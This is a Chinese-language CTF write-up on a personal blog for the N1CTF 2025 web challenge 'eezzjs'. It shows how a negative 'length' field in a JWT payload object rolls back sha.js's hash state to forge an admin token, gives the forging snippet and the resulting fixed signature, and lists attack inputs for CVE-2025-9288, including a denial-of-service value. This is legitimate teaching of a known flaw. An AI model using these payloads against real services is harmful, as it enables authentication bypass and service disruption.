<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="keywords"><meta name="descriptioon" content=""><meta name="renderer" content="wekit"><link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon"><link rel="stylesheet" href="/css/public.css"><link rel="stylesheet" href="/css/reset.css"><link rel="stylesheet" href="/css/iconfont.css"><title>2025N1CTF WP [ Hexo ]</title><link rel="stylesheet" href="/css/partial/footer.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css"><link rel="stylesheet" href="/css/partial/sidebar.css"><link rel="stylesheet" href="/css/post.css"><link rel="stylesheet" href="https://imsun.github.io/gitment/style/default.css"><meta name="generator" content="Hexo 8.1.1"></head><body><link rel="stylesheet" href="/css/partial/header.css"><div class="header"><div class="maxwidth"><div class="nav"><a id="artlist" href="/404"><i class="iconfont icon404"></i><span class="headhid">&nbsp;404</span></a><a id="artlist" href="/archives"><i class="iconfont iconarchives"></i><span class="headhid">&nbsp;Archives</span></a><a id="artlist" href="/link"><i class="iconfont iconlink"></i><span class="headhid">&nbsp;Link</span></a><a id="artlist" href="/about"><i class="iconfont iconabout"></i><span class="headhid">&nbsp;About</span></a></div><a class="search" href="/">Woore</a></div></div><div class="main"> <div class="maxwidth"><link rel="stylesheet" href="/css/partial/sidebar.css"><div id="sidebar"><div class="social"><a href="/archives" title="Home"><i class="iconfont iconHome"></i></a><a href="mailto:tongt0232@gmail.com" title="E-Mail"><i class="iconfont iconweibiaoti554"></i></a><a target="_blank" rel="noopener" href="https://github.com/Woor3x" title="GitHub"><i class="iconfont iconGitHub"></i></a><a target="_blank" rel="noopener" href="https://juejin.cn/user/1204720474809741" title="juejin"><img src="/images/juejinicon-sidebar.png"></a><a target="_blank" rel="noopener" href="https://www.jianshu.com/u/20de04cc53de" title="jianshu"><img src="/images/jianicon-sidebar.png"></a></div><div class="structure category-list"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#2025N1CTF-WP"><span class="toc-number">1.</span> <span class="toc-text">2025N1CTF WP</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB"><span class="toc-number">2.</span> <span class="toc-text">WEB</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#eezzjs"><span class="toc-number">2.1.</span> <span class="toc-text">eezzjs</span></a></li></ol></li></ol></div><div class="tags"><a href="/tags/AI/" style="font-size: 24px; color: #b46e00">AI</a> <a href="/tags/CTF/" style="font-size: 24px; color: #b46e00">CTF</a> <a href="/tags/Note/" style="font-size: 12px; color: #ffac00">Note</a> <a href="/tags/web/" style="font-size: 12px; color: #ffac00">web</a> <a href="/tags/%E5%A6%99%E5%A6%99%E5%B0%8F%E5%B7%A5%E5%85%B7/" style="font-size: 12px; color: #ffac00">妙妙小工具</a> <a href="/tags/%E6%A0%87%E7%AD%BE/" style="font-size: 12px; color: #ffac00">标签</a></div></div><div class="post rightside"><h1 class="artititle">2025N1CTF WP</h1><div class="info"><i class="iconfont iconbiaoqian" title="文章标签"><span>CTF</span></i><i class="iconfont iconshijian"><span title="文章发布时间">2025-11-03</span></i></div><div class="postDetail"><h2 id="2025N1CTF-WP"><a href="#2025N1CTF-WP" class="headerlink" title="2025N1CTF WP"></a>2025N1CTF WP</h2><hr>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a><strong>WEB</strong></h2><h3 id="eezzjs"><a href="#eezzjs" class="headerlink" title="eezzjs"></a>eezzjs</h3><p>审计代码，程序主要做了一个登录的jwt的检验</p>
<p>程序里面的admin_password和secret的值都是随机的字节，并且没有register的功能，因此我们没有办法拿到任何的token，只能自己伪造。</p>
<p>再审计代码可以看到在auth.js的verifyJWT函数中，计算sha256的时候往hash里面传入的payload是一个object的值</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">const expectedSignatureHex = sha256(...[JSON.stringify(header), payload, secret]);</span><br></pre></td></tr></table></figure>

<p>sha256函数则是将传入的值全部update进hash，然后再对其进行加密计算</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">const sha256 = (...messages) =&gt; &#123;</span><br><span class="line">    const hash = sha(&#x27;sha256&#x27;);</span><br><span class="line">    messages.forEach((m) =&gt; hash.update(m));</span><br><span class="line">    return hash.digest(&#x27;hex&#x27;);</span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>这个时候我们去找update的源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">Hash.prototype.update = function (data, enc) &#123;</span><br><span class="line">  if (typeof data === &#x27;string&#x27;) &#123;</span><br><span class="line">    enc = enc || &#x27;utf8&#x27;</span><br><span class="line">    data = Buffer.from(data, enc)</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  var block = this._block</span><br><span class="line">  var blockSize = this._blockSize</span><br><span class="line">  var length = data.length</span><br><span class="line">  var accum = this._len</span><br><span class="line"></span><br><span class="line">  for (var offset = 0; offset &lt; length;) &#123;</span><br><span class="line">    var assigned = accum % blockSize</span><br><span class="line">    var remainder = Math.min(length - offset, blockSize - assigned)</span><br><span class="line"></span><br><span class="line">    for (var i = 0; i &lt; remainder; i++) &#123;</span><br><span class="line">      block[assigned + i] = data[offset + i]</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    accum += remainder</span><br><span class="line">    offset += remainder</span><br><span class="line"></span><br><span class="line">    if ((accum % blockSize) === 0) &#123;</span><br><span class="line">      this._update(block)</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  this._len += length</span><br><span class="line">  return this</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到，当传入update的为非string值时，仍然会有一个取data.length并加入this._len的过程，那么当我们修改传入的data的length的值，就可以影响前后传入的变量后的结果，如果所有的参数传输完毕后，若this._len&#x3D;0，那么最终hash.digest()的结果就会是一个固定的值。</p>
<p>那么观察secret的生成规则</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">const JWT_SECRET = crypto.randomBytes(9).toString(&#x27;hex&#x27;);</span><br></pre></td></tr></table></figure>

<p>可以注意到secret是一个18字节的字符串，那只要在sha256函数传入secret之前将this._len设置为-18，后面加上secret之后sha256的返回结果就是固定可知的。</p>
<p>调用signJWT函数伪造JWT</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">const header = &#123; alg: &#x27;HS256&#x27;, typ: &#x27;JWT&#x27; &#125;;</span><br><span class="line">const len=-(JSON.stringify(header).length+18);</span><br><span class="line">token=signJWT(&#123;username:&quot;admin&quot;,length:len&#125;,crypto.randomBytes(9).toString(&#x27;hex&#x27;))</span><br></pre></td></tr></table></figure>

<p>此时，sha256在传入header，payload，secret后最终返回的结果将会固定为674dcdbbb09261235ee8efc1999daee725dad0ec314a8d1d80cb11229e7596c1</p>
<p>此时修改token&#x3D;674dcdbbb09261235ee8efc1999daee725dad0ec314a8d1d80cb11229e7596c1，访问&#x2F;upload即可绕过verifyJWT</p>
<p>其实这是一个新鲜的CVE漏洞CVE-2025-9288</p>
<p>漏洞核心：输入类型检查缺失引发的加密灾难</p>
<p>漏洞点在的JavaScript加密库<code>sha.js@2.4.5–2.4.11及 sha.js@3.2.4–3.2.8</code></p>
<p><strong>攻击者可实现的四类危害</strong>：</p>
<ol>
<li><p><strong>哈希状态回滚</strong></p>
<p>输入<code>{ length: -x }</code>类参数可回滚内部状态，将标记哈希（用于数据完整性保护）降级为未标记哈希，破坏加密机制。</p>
</li>
<li><p><strong>数值误算与碰撞</strong></p>
<p>构造<code>{ length: buf.length, ...buf, 0: buf[0] + 256 }</code>使不同数值生成相同哈希，引发逻辑不一致（如与<code>bn.js</code>交互时）。</p>
</li>
<li><p><strong>拒绝服务（DoS）攻击</strong></p>
<p>输入<code>{ length: &#39;1e99&#39; }</code>导致函数无限挂起，服务资源耗尽。</p>
</li>
<li><p><strong>私钥提取（最严重后果）</strong></p>
<p>在依赖哈希生成随机数的系统（如非对称加密）中，匹配哈希值但数值解释差异可导致私钥被推导恢复。</p>
</li>
</ol>
<hr>
</div><link rel="stylesheet" href="/css/partial/footer.css"><div class="footer"><p><span>Copyright © 2017 - 2023</span><a target="_blank" rel="noopener" href="http://www.beian.miit.gov.cn/">蜀ICP备19024124号</a></p><p><i class="iconfont iconchakan"><span>本站总访问量</span><span id="busuanzi_container_site_pv">  <span id="busuanzi_value_site_pv"></span> </span></i><i class="iconfont iconabout"><span>本站访客数</span><span id="busuanzi_container_site_uv">  <span id="busuanzi_value_site_uv"></span> </span></i></p></div></div></div></div><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></body></html>